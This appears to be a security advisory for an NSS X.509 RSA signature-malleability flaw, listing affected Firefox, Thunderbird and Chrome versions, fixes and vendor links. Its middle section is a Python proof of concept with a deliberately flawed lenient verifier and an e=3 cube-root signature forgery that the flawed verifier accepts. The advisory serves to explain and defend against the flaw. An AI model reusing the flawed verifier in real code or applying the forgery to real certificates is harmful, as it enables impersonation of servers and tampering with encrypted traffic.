Vulnerability identifier: #VU33655
Vulnerability risk: Medium
CVSSv4.0: 2.7 [CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:U/U:Green]
CVE-ID:
CWE-ID: CWE-310
Exploitation vector: Network
Exploit availability: No
Description
The vulnerability allows a remote non-authenticated attacker to forge RSA signatures on X.509 certificates and thereby impersonate servers, reading and manipulating data in transit.
Mozilla Network Security Services (NSS) before 3.16.2.1, 3.16.x before 3.16.5, and 3.17.x before 3.17.1, as used in Mozilla Firefox before 32.0.3, Mozilla Firefox ESR 24.x before 24.8.1 and 31.x before 31.1.1, Mozilla Thunderbird before 24.8.1 and 31.x before 31.1.2, Mozilla SeaMonkey before 2.29.1, Google Chrome before 37.0.2062.124 on Windows and OS X, and Google Chrome OS before 37.0.2062.120, does not properly parse ASN.1 values in X.509 certificates, which makes it easier for remote attackers to spoof RSA signatures via a crafted certificate, aka a "signature malleability" issue.
The affected code decodes the DER-encoded DigestInfo structure inside a PKCS#1 v1.5 signature block too loosely, so a block that is not the single correct encoding can still be accepted. An attacker who can place chosen bytes in the slack the parser tolerates does not need the private key: for a CA public key with a low public exponent (e = 3) a signature value whose cube has the required prefix is obtained by taking an integer cube root, which is why the issue is described as signature malleability. Exploitation therefore requires a trusted CA or intermediate certificate whose RSA public exponent is 3 and a position from which the forged certificate can be presented to the client, for example a man-in-the-middle on a TLS connection.
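Worked example, added here for illustration (it is not code from this advisory, from NSS or from any vendor listed below, and it models the general flaw class of a verifier that tolerates slack in the decrypted block rather than the exact NSS code path): a pure-Python PKCS#1 v1.5 verifier that parses the DigestInfo out of the block and ignores the bytes after it, beside a strict verifier that re-encodes and compares the whole block, and the attacker's e = 3 cube-root forgery that only the lenient verifier accepts. The 2048-bit key, the fixed seed and the signed message are constructed for the demo.

```python
import hashlib
import hmac
import random
RNG = random.Random(20140924)  # fixed seed: constructed demo key, not a real CA key
SMALL_PRIMES = [p for p in range(3, 2000, 2) if all(p % q for q in range(3, p, 2))]
SHA256_DIGESTINFO_PREFIX = bytes.fromhex("3031300d060960864801650304020105000420")  # DER SHA-256 DigestInfo prefix


def is_probable_prime(n, rounds=16):
    """Trial division by small primes, then Miller-Rabin with `rounds` random bases."""
    if any(n % p == 0 for p in SMALL_PRIMES):
        return False
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(RNG.randrange(2, n - 1), d, n)
        if x not in (1, n - 1) and not any((x := x * x % n) == n - 1 for _ in range(r - 1)):
            return False
    return True


def gen_key(bits=2048, e=3):
    primes = []
    while len(primes) < 2:
        p = RNG.getrandbits(bits // 2) | (1 << (bits // 2 - 1)) | 1
        if (p - 1) % e and is_probable_prime(p):  # e = 3 needs gcd(3, p - 1) == 1
            primes.append(p)
    p, q = primes
    return p * q, e, pow(e, -1, (p - 1) * (q - 1))  # (n, e, d)


def digest_info(msg):
    return SHA256_DIGESTINFO_PREFIX + hashlib.sha256(msg).digest()


def emsa_pkcs1_v15(msg, k):
    t = digest_info(msg)
    return b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t


def sign(msg, n, d):
    k = (n.bit_length() + 7) // 8
    return pow(int.from_bytes(emsa_pkcs1_v15(msg, k), "big"), d, n).to_bytes(k, "big")


def verify_strict(msg, sig, n, e):
    k = (n.bit_length() + 7) // 8
    em = pow(int.from_bytes(sig, "big"), e, n).to_bytes(k, "big")
    # Correct check (RFC 8017 8.2.2): re-encode the expected block and compare all of it.
    return len(sig) == k and hmac.compare_digest(em, emsa_pkcs1_v15(msg, k))


def _read_tlv(buf, pos):
    """Minimal TLV reader -> (tag, value, end); long-form lengths accepted."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        m = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + m], "big"), pos + m
    return tag, buf[pos:pos + length], pos + length


def verify_lenient(msg, sig, n, e):
    """Flawed check: parses DigestInfo out of the block and ignores what follows it."""
    k = (n.bit_length() + 7) // 8
    em = pow(int.from_bytes(sig, "big"), e, n).to_bytes(k, "big")
    i = 2
    while i < k and em[i] == 0xFF:
        i += 1
    if len(sig) != k or em[:2] != b"\x00\x01" or i < 10 or i == k or em[i] != 0:
        return False  # bad header, fewer than 8 padding bytes, or no separator
    tag, seq, end = _read_tlv(em, i + 1)  # BUG: `end` is never compared with k
    tag2, _alg, pos = _read_tlv(seq, 0)  # AlgorithmIdentifier contents not validated either
    tag3, digest, _ = _read_tlv(seq, pos)
    return (tag, tag2, tag3) == (0x30, 0x30, 0x04) and digest == hashlib.sha256(msg).digest()


def icbrt(x):
    """Largest integer s with s ** 3 <= x (binary search)."""
    lo, hi = 0, 1 << (x.bit_length() // 3 + 1)
    while lo < hi:
        mid = (lo + hi + 1) // 2
        lo, hi = (mid, hi) if mid ** 3 <= x else (lo, mid - 1)
    return lo


def forge(msg, n, e=3):
    """Attacker side, public key only: minimal prefix, free tail, cube root (s ** 3 < n)."""
    assert e == 3, "cube-root forgery needs a low public exponent"
    k = (n.bit_length() + 7) // 8
    prefix = b"\x00\x01" + b"\xff" * 8 + b"\x00" + digest_info(msg)
    free = k - len(prefix)
    s = icbrt(int.from_bytes(prefix + b"\xff" * free, "big"))
    if s ** 3 < int.from_bytes(prefix + b"\x00" * free, "big"):
        raise ValueError("block too short for a cube to land in the free range")
    return s.to_bytes(k, "big")


def demo():
    n, e, d = gen_key()
    msg = b"CN=example.test, constructed certificate body"  # constructed input
    genuine, forged = sign(msg, n, d), forge(msg, n, e)
    return {
        "strict_accepts_genuine": verify_strict(msg, genuine, n, e),
        "lenient_accepts_genuine": verify_lenient(msg, genuine, n, e),
        "strict_accepts_forged": verify_strict(msg, forged, n, e),
        "lenient_accepts_forged": verify_lenient(msg, forged, n, e),
    }


if __name__ == "__main__":
    print(demo())
```

Run with Python 3.8 or later (pow(e, -1, m) and assignment expressions). demo() returns a dict in which the genuine signature is accepted by both verifiers and the forged one only by the lenient verifier. The 194 free bytes at the end of a 2048-bit block are far more than the gap between consecutive cubes near the cube root of the block, so the forgery always succeeds at this key size. The defence is the strict comparison: compute the expected encoded block and require byte-for-byte equality, rather than parsing the received block and trusting whatever the parser does not consume.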
Mitigation
Install update from vendor's website: NSS 3.16.2.1, 3.16.5 or 3.17.1 or later; Firefox 32.0.3; Firefox ESR 24.8.1 or 31.1.1; Thunderbird 24.8.1 or 31.1.2; SeaMonkey 2.29.1; Google Chrome 37.0.2062.124 (Windows, OS X); Google Chrome OS 37.0.2062.120. Distribution packages of NSS should be updated as well (see the Debian, Red Hat, Ubuntu, openSUSE and Gentoo advisories below), since any application that links NSS for certificate verification is affected.
External links
https://googlechromereleases.blogspot.com/2014/09/stable-channel-update_24.html
https://googlechromereleases.blogspot.com/2014/09/stable-channel-update-for-chrome-os_24.html
https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10698
https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10761
https://lists.opensuse.org/opensuse-security-announce/2014-09/msg00032.html
https://lists.opensuse.org/opensuse-security-announce/2014-09/msg00036.html
https://lists.opensuse.org/opensuse-security-announce/2014-09/msg00039.html
https://rhn.redhat.com/errata/RHSA-2014-1307.html
https://rhn.redhat.com/errata/RHSA-2014-1354.html
https://rhn.redhat.com/errata/RHSA-2014-1371.html
https://secunia.com/advisories/61540
https://secunia.com/advisories/61574
https://secunia.com/advisories/61575
https://secunia.com/advisories/61576
https://secunia.com/advisories/61583
https://www.debian.org/security/2014/dsa-3033
https://www.debian.org/security/2014/dsa-3034
https://www.debian.org/security/2014/dsa-3037
https://www.kb.cert.org/vuls/id/772676
https://www.mozilla.org/security/announce/2014/mfsa2014-73.html
https://www.novell.com/support/kb/doc.php?id=7015701
https://www.oracle.com/technetwork/topics/security/bulletinapr2016-2952098.html
https://www.oracle.com/technetwork/topics/security/cpuapr2015-2365600.html
https://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html
https://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html
https://www.oracle.com/technetwork/topics/security/ovmbulletinjul2016-3090546.html
https://www.securityfocus.com/bid/70116
https://www.ubuntu.com/usn/USN-2360-1
https://www.ubuntu.com/usn/USN-2360-2
https://www.ubuntu.com/usn/USN-2361-1
https://bugzilla.mozilla.org/show_bug.cgi?id=1064636
https://bugzilla.mozilla.org/show_bug.cgi?id=1069405
https://exchange.xforce.ibmcloud.com/vulnerabilities/96194
https://security.gentoo.org/glsa/201504-01
Can this vulnerability be exploited remotely?
Yes. This vulnerability can be exploited by a remote non-authenticated attacker via the Internet, for example by presenting a crafted certificate to the client from a rogue or man-in-the-middle TLS server.
Is there known malware, which exploits this vulnerability?
No. We are not aware of malware exploiting this vulnerability.